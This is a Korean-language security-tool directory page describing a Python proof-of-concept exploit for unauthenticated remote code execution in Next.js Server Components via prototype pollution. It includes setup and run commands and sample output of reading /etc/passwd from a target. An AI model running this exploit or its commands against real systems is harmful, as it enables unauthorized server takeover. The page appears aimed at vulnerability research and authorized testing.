Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-55182-PoC — React2Shell (CVE-2025-66478): Next.js 서버 컴포넌트의 치명적 원격 코드 실행(RCE)을 위한 파이썬 기반 개념 증명입니다. 대화형 CLI, 사용자 정의 페이로드 주입, 깔끔한 출력 형식을 제공합니다. 교육 연구 목적으로만 사용하십시오. | Kitploit
도구/GitHubGitHub/ravindurathnayaka/cve-2025-55182-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubravindurathnayaka/cve-2025-55182-poc

CVE-2025-55182-PoC

React2Shell (CVE-2025-66478): Next.js 서버 컴포넌트의 치명적 원격 코드 실행(RCE)을 위한 파이썬 기반 개념 증명입니다. 대화형 CLI, 사용자 정의 페이로드 주입, 깔끔한 출력 형식을 제공합니다. 교육 연구 목적으로만 사용하십시오.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
428개월 전아직 검토되지 않음

⚡ React2Shell 익스플로잇 PoC (CVE-2025-66478)

Next.js 원격 코드 실행 (RCE) - 서버 컴포넌트의 프로토타입 오염을 통한

Python Exploit Type CVE


🕵️‍♂️ 개요

이 저장소는 Next.js 애플리케이션 중 특정 버전의 React Server Components (RSC) 를 사용하는 애플리케이션에 영향을 미치는 심각한 취약점인 CVE-2025-66478 (일부 맥락에서 CVE-2025-55182 로도 참조됨)에 대한 개념 증명 (PoC) 을 포함합니다.

RSC의 직렬화 과정을 조작하여, 인증되지 않은 공격자가 프로토타입 오염 (__proto__:then) 을 통해 악성 페이로드를 주입할 수 있습니다. 이는 child_process.execSync를 통해 서버에서 임의의 시스템 명령 실행으로 이어질 수 있습니다.

개발자: ArkhamKnight47


🚀 기능

  • 대화형 CLI — 대상 URL 및 명령에 대한 간단한 프롬프트.
  • 페이로드 주입 — 필요한 multipart/form-data 페이로드를 자동으로 구성합니다.
  • 스마트 출력 정리 — 원시 JSON 응답을 파싱하고 오직 깨끗한 명령 출력만 표시합니다 (예: 1:E{"digest":...} 제거).
  • 매트릭스 테마 — ASCII 아트 배너가 포함된 녹색/검정 미학.
  • 크로스 플랫폼 — Windows 및 Linux 대상에서 깨끗한 출력을 위해 개행 차이(\n vs \r\n)를 처리합니다.

🛠️ 설치 및 사용법

전제 조건

  • Python 3.x
  • requests 라이브러리

설정

root@kitploit:~
# Clone the repository
git clone https://github.com/RavinduRathnayaka/CVE-2025-55182-PoC.git
cd CVE-2025-55182-PoC

# Install dependencies
pip install requests

익스플로잇 실행

root@kitploit:~
python CVE-2025-66478.py

다음 항목을 입력하라는 메시지가 표시됩니다:

  • 대상 URL — 예: http://localhost:3000
  • 명령 — 예: id, whoami, cat /etc/passwd

📌 예제 출력

root@kitploit:~
[?] TARGET URL > http://192.168.1.5:3000
[?] COMMAND    > cat /etc/passwd

[*] EXECUTING EXPLOIT...
[+] PAYLOAD SUCCESSFUL. OUTPUT BELOW:
============================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
============================================================

⚠️ 면책 조항

이 도구는 교육 및 보안 연구 목적으로만 제공됩니다.

저자(ArkhamKnight47)는 이 코드의 오용에 대해 책임을 지지 않습니다. 소유하지 않거나 명시적 테스트 허가를 받지 않은 시스템에 대해 이 익스플로잇을 테스트하는 것은 불법적이고 비윤리적입니다.

  • ❌ 승인 없이 프로덕션 시스템에 사용하지 마십시오
  • ✅ 자신의 애플리케이션에서 취약점을 검증하는 데 사용하십시오
  • ✅ RSC 직렬화 및 프로토타입 오염 위험에 대해 배우는 데 사용하십시오

책임감 있게 사용하십시오. 윤리적으로 배우십시오. 스택을 보호하십시오.

도구 다운로드